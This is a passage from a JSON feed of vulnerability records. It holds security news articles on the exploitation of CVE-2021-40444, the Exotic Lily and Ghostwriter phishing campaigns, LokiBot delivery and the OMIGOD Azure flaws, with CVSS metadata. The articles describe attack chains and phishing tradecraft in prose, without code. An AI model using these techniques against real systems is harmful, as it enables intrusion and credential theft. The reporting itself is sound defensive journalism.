payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (&amp; dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-s5Iv1JAWb9E/YUI9Ecx55CI/AAAAAAAADzc/GZ8B73768Pk8g0hW4maN8O-IOSq9arQIQCLcBGAsYHQ/s0/azure.gif>)\n\nMicrosoft on Tuesday addressed a quartet of security flaws as part of its [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) that could be abused by adversaries to target Azure cloud customers and elevate privileges as well as allow for remote takeover of vulnerable systems.\n\nThe list of flaws, collectively called **OMIGOD** by researchers from Wiz, affect a little-known software agent called Open Management Infrastructure that's automatically deployed in many Azure services -\n\n * [**CVE-2021-38647**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>) (CVSS score: 9.8) - Open Management Infrastructure Remote Code Execution Vulnerability\n * [**CVE-2021-38648**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) (CVSS score: 7.8) - Open Management Infrastructure Elevation of Privilege Vulnerability\n * [**CVE-2021-38645**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) (CVSS score: 7.8) - Open Management Infrastructure Elevation of Privilege Vulnerability\n * [**CVE-2021-38649**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) (CVSS score: 7.0) - Open Management Infrastructure Elevation of Privilege Vulnerability\n\nOpen Management Infrastructure ([OMI](<https://github.com/microsoft/omi>)) is an open-source [analogous equivalent](<https://cloudblogs.microsoft.com/windowsserver/2012/06/28/open-management-infrastructure/>) of Windows Management Infrastructure (WMI) but designed for Linux and UNIX systems such as CentOS, Debian, Oracle Linux, Red Hat Enterprise Linux Server, SUSE Linux, and Ubuntu that allows for monitoring, inventory management, and syncing configurations across IT environments.\n\nAzure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation.\n\n\"When users enable any of these popular services, OMI is silently installed on their virtual machine, running at the highest privileges possible,\" Wiz security researcher Nir Ohfeld [said](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>). \"This happens without customers' explicit consent or knowledge. Users simply click agree to log collection during set-up and they have unknowingly opted in.\"\n\n\"In addition to Azure cloud customers, other Microsoft customers are affected since OMI can be independently installed on any Linux machine and is frequently used on-premise,\" Ohfeld added.\n\nSince the OMI agent runs as root with the highest privileges, the aforementioned vulnerabilities could be abused by external actors or low-privileged users to remotely execute code on target machines and escalate privileges, thereby enabling the threat actors to take advantage of the elevated permissions to mount sophisticated attacks.\n\n[](<https://thehackernews.com/images/-T0XmM7RcIvQ/YUI8jF03JfI/AAAAAAAADzU/AYwbK2Xv1cAtn6q-McPGNwxtZbKSWYYIwCLcBGAsYHQ/s0/hack-1.gif>)\n\nThe most critical of the four flaws is a remote code execution flaw arising out of an internet-exposed HTTPS port like 5986, 5985, or 1270, allowing attackers to obtain initial access to a target Azure environment and subsequently move laterally within the network.\n\n\"This is a textbook RCE vulnerability that you would expect to see in the 90's \u2013 it's highly unusual to have one crop up in 2021 that can expose millions of endpoints,\" Ohfeld said. \"With a single packet, an attacker can become root on a remote machine by simply removing the authentication header. It's that simple.\"\n\n\"OMI is just one example of a 'secret' software agent that's pre-installed and silently deployed in cloud environments. It's important to note that these agents exist not just in Azure but in [Amazon Web Services] and [Google Cloud Platform] as well.\"\n\n**_Update:_** Microsoft on Thursday published additional guidance for the [OMIGOD vulnerabilities](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>), urging customers to apply the updates manually as and when they become available per the schedule outlined [here](<https://msrc-blog.microsoft.com/2021/09/16/additional-guidance-regarding-omi-vulnerabilities-within-azure-vm-management-extensions/>). The security issues impact all versions of OMI below [1.6.8-1](<https://github.com/microsoft/omi/releases/tag/v1.6.8-1>).\n\n\"Several Azure Virtual Machine (VM) management extensions use [the OMI] framework to orchestrate configuration management and log collection on Linux VMs,\" Microsoft Security Response Center said in a bulletin. \"The remote code execution vulnerability only impacts customers using a Linux management solution (on-premises SCOM or Azure Automation State Configuration or Azure Desired State Configuration extension) that enables remote OMI management.\"\n\nThe development comes as Bad Packets [reported](<https://twitter.com/bad_packets/status/1438753415106994179>) [mass scanning](<https://www.greynoise.io/viz/query/?gnql=cve%3ACVE-2021-38647>) of Azure Linux-based servers vulnerable to the remote code execution flaw in an attempt to hijack vulnerable systems and mount further attacks, which, in turn, have been fueled by the [public release](<https://twitter.com/GossiTheDog/status/1438604418212114440>) of a proof-of-concept (PoC) exploit.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T18:36:00", "type": "thn", "title": "Critical Flaws Discovered in Azure App That Microsoft Secretly Installs on Linux VMs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2021-09-17T19:17:45", "id": "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "href": "https://thehackernews.com/2021/09/critical-flaws-discovered-in-azure-app.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:39:07", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-36963.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38633", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-26T21:23:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38633", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38633", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", 